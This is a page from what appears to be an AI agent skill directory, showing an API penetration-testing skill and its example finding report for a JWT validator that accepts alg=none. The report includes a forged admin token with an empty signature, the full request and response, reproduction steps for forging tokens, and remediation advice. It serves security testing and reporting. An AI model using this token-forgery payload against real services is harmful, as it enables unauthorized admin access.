All skills
hardw00t avatar

/api-security

@f9bb3b2

Router skill for API penetration testing across REST, GraphQL, gRPC, and WebSocket. Covers OWASP API Top 10 (2023) including BOLA/BFLA/BOPLA, JWT attack chains, GraphQL introspection abuse, and mass assignment. Invoke when the user asks to pentest an API, analyze OpenAPI/Swagger, test auth/authorization, fuzz endpoints, or find API vulnerabilities.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/api-security

This session only. Nothing lands on disk.

examplesjwt_none_finding.md

≈393 tokens on demand. Your agent reads this file only when SKILL.md points to it.

Example: JWT alg=none Finding Blueprint

{
  "id": "APISEC-2026-002",
  "title": "JWT validator accepts alg=none, allowing arbitrary claim forgery",
  "severity": "critical",
  "confidence": "confirmed",
  "cwe": "CWE-347",
  "owasp": "API2:2023",
  "owasp_api_id": "API2:2023",
  "cvss": 9.1,
  "endpoint": "/api/v1/me",
  "http_method": "GET",
  "api_type": "rest",
  "auth_context": "unauthenticated",
  "evidence": {
    "jwt_header": "{\"alg\":\"none\",\"typ\":\"JWT\"}",
    "jwt_payload": "{\"sub\":\"admin\",\"role\":\"admin\",\"exp\":9999999999}",
    "request": "GET /api/v1/me HTTP/1.1\nHost: target.tld\nAuthorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.",
    "response": "HTTP/1.1 200 OK\n\n{\"sub\":\"admin\",\"role\":\"admin\"}"
  },
  "reproduction": [
    "Craft header {\"alg\":\"none\",\"typ\":\"JWT\"}.",
    "Craft payload with desired sub/role claims.",
    "Concatenate base64url(header) + '.' + base64url(payload) + '.' (empty signature).",
    "Send as Bearer to any authenticated endpoint; observe 200 with elevated identity."
  ],
  "remediation": "Configure JWT library to reject alg=none and enforce an allowlist of expected algorithms (e.g. RS256 only). Validate alg matches the key type before verifying.",
  "references": [
    "https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/",
    "https://cwe.mitre.org/data/definitions/347.html",
    "https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/"
  ]
}

Source: SKILL.md on GitHub

1 warning16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The analyzed skill contains standard penetration testing guides, methodology documents, and common vulnerability checklists for API security auditing. No malicious behavior, prompt injection, or hidden execution channels were detected.

  • Socket16d

    3 alerts: gptSecurity

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/api-security